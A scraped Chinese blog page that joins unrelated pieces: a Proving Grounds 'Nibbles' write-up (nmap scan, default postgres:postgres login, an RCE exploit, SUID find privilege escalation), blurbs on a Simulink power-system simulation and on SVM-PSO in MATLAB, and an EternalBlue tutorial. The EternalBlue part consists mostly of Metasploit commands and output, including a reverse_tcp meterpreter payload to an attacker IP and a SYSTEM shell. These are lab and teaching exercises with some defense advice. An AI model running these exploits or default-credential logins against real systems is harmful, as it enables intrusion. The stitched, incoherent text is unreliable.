PG靶机复现 Nibbles

枚举

nmap -sC -sV -T4 -Pn -n -p- 192.168.214.47

在这里插入图片描述
发现5437端口开启,google一下版本
在这里插入图片描述
在这里插入图片描述
可能存在RCE,但是利用需要凭证

利用

在这里插入图片描述
这里猜测一下,使用postgres : postgres 成功进入,运气不错
在这里插入图片描述
利用代码成功,拿到shell

提权

在这里插入图片描述
在这里插入图片描述
上传linPEAS枚举,发现suid find可以利用
在这里插入图片描述
成功

【电力系统】单机无穷大电力系统短路故障暂态稳定Simulink仿真(带说明文档)内容概要:本文档围绕“单机无穷大电力系统短路故障暂态稳定Simulink仿真”展开,提供了完整的仿真模型与说明文档,重点研究电力系统在发生短路故障后的暂态稳定性问题。通过Simulink搭建单机无穷大系统模型,模拟不同类型的短路故障(如三相短路),分析系统在故障期间及切除后的动态响应,包括发电机转子角度、转速、电压和功率等关键参数的变化,进而评估系统的暂态稳定能力。该仿真有助于理解电力系统稳定性机理,掌握暂态过程分析方法。; 适合人群:电气工程及相关专业的本科生、研究生,以及从事电力系统分析、运行与控制工作的科研人员和工程师。; 使用场景及目标:①学习电力系统暂态稳定的基本概念与分析方法;②掌握利用Simulink进行电力系统建模与仿真的技能;③研究短路故障对系统稳定性的影响及提高稳定性的措施(如故障清除时间优化);④辅助课程设计、毕业设计或科研项目中的系统仿真验证。; 阅读建议:建议结合电力系统稳定性理论知识进行学习,先理解仿真模型各模块的功能与参数设置,再运行仿真并仔细分析输出结果,尝试改变故障类型或系统参数以观察其对稳定性的影响,从而深化对暂态稳定问题的理解。
本研究聚焦于运用MATLAB平台,将支持向量机(SVM)应用于数据预测任务,并引入粒子群优化(PSO)算法对模型的关键参数进行自动调优。该研究属于机器学习领域的典型实践,其核心在于利用SVM构建分类模型,同时借助PSO的全局搜索能力,高效确定SVM的最优超参数配置,从而显著增强模型的整体预测效能。 支持向量机作为一种经典的监督学习方法,其基本原理是通过在高维特征空间中构造一个具有最大间隔的决策边界,以实现对样本数据的分类或回归分析。该算法擅长处理小规模样本集、非线性关系以及高维度特征识别问题,其有效性源于通过核函数将原始数据映射至更高维的空间,使得原本复杂的分类问题变得线性可分。 粒子群优化算法是一种模拟鸟群社会行为的群体智能优化技术。在该算法框架下,每个潜在解被视作一个“粒子”,粒子群在解空间中协同搜索,通过不断迭代更新自身速度与位置,并参考个体历史最优解和群体全局最优解的信息,逐步逼近问题的最优解。在本应用中,PSO被专门用于搜寻SVM中影响模型性能的两个关键参数——正则化参数C与核函数参数γ的最优组合。 项目所提供的实现代码涵盖了从数据加载、预处理(如标准化处理)、基础SVM模型构建到PSO优化流程的完整步骤。优化过程会针对不同的核函数(例如线性核、多项式核及径向基函数核等)进行参数寻优,并系统评估优化前后模型性能的差异。性能对比通常基于准确率、精确率、召回率及F1分数等多项分类指标展开,从而定量验证PSO算法在提升SVM模型分类能力方面的实际效果。 本研究通过一个具体的MATLAB实现案例,旨在演示如何将全局优化算法与机器学习模型相结合,以解决模型参数选择这一关键问题。通过此实践,研究者不仅能够深入理解SVM的工作原理,还能掌握利用智能优化技术提升模型泛化性能的有效方法,这对于机器学习在实际问题中的应用具有重要的参考价值。 资源来源于网络分享,仅用于学习交流使用,请勿用于商业,如有侵权请联系我删除!
### 环境搭建与配置 为了成功复现 EternalBlue 漏洞,首先需要准备好实验环境。靶机选择 **Windows 7** 系统,IP 地址为 `192.168.244.133`;攻击机使用 **Kali Linux**,IP 地址为 `192.168.244.136`。所需工具包括 `nmap` 和 `metasploit-framework (MSF)`,这些工具默认集成在 Kali 系统中[^1]。 #### 靶机准备 - 安装 Windows 7 系统,并确保未安装补丁 KB4012598(该补丁修复了 MS17-010 漏洞)。 - 关闭防火墙或允许 SMB 协议通过。 - 确保系统开启了文件共享功能,SMB 服务运行正常。 #### 攻击机准备 - 安装 Kali Linux 并更新系统。 - 安装 Metasploit Framework,可通过命令 `sudo apt install metasploit-framework` 进行安装。 - 确认 nmap 已安装,用于网络扫描和端口探测。 ### 使用 Metasploit 复现 EternalBlue 漏洞 #### 启动 Metasploit Framework 打开终端并输入以下命令启动 Metasploit: ```bash msfconsole ``` 进入 Metasploit 控制台后,输出信息显示当前版本及模块数量,如下所示: ``` =[ metasploit v6.3.27-dev ] + -- --=[ 2335 exploits - 1220 auxiliary - 413 post ] + -- --=[ 1385 payloads - 46 encoders - 11 nops ] + -- --=[ 9 evasion ] ``` #### 搜索 EternalBlue 模块 在 Metasploit 控制台中执行以下命令搜索相关模块: ```bash search eternalblue ``` 系统将列出多个与 EternalBlue 相关的模块,例如 `exploit/windows/smb/ms17_010_eternalblue`。选择该模块进行漏洞利用: ```bash use exploit/windows/smb/ms17_010_eternalblue ``` #### 设置目标与负载 查看模块所需的参数: ```bash show options ``` 主要需要设置以下参数: - `RHOSTS`: 靶机 IP 地址,即 `192.168.244.133` - `LHOST`: 攻击机 IP 地址,即 `192.168.244.136` 设置参数命令如下: ```bash set RHOSTS 192.168.244.133 set LHOST 192.168.244.136 ``` 默认情况下,模块会使用合适的 payload,如 `windows/x64/meterpreter/reverse_tcp`。若需更改 payload,可使用 `set payload` 命令指定。 #### 执行漏洞利用 完成所有设置后,执行漏洞利用: ```bash exploit ``` 如果一切顺利,Metasploit 将尝试连接靶机并通过 SMB 协议发送恶意数据包,最终获得 Meterpreter 会话。 #### 成功获取 Meterpreter 会话 一旦漏洞利用成功,控制台将显示 Meterpreter 提示符,表示已成功获取目标系统的控制权。此时可以执行多种操作,如上传文件、执行命令等。 ```bash meterpreter > getuid Server username: NT AUTHORITY\SYSTEM ``` 上述结果显示当前权限为 `NT AUTHORITY\SYSTEM`,即最高权限,说明漏洞利用成功。 ### 注意事项与防御建议 - **测试环境隔离**:确保实验环境与生产网络隔离,避免误伤真实系统。 - **漏洞修复**:微软已于 2017 年发布补丁 KB4012598 修复此漏洞。对于实际环境中未打补丁的系统,应尽快安装官方补丁。 - **SMB 协议防护**:企业网络中应限制 SMB 协议的外部访问,关闭不必要的共享服务,启用防火墙规则阻止非法 SMB 请求。 - **入侵检测**:部署 IDS/IPS 系统,监控异常 SMB 流量,及时发现类似 EternalBlue 的攻击行为。 ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值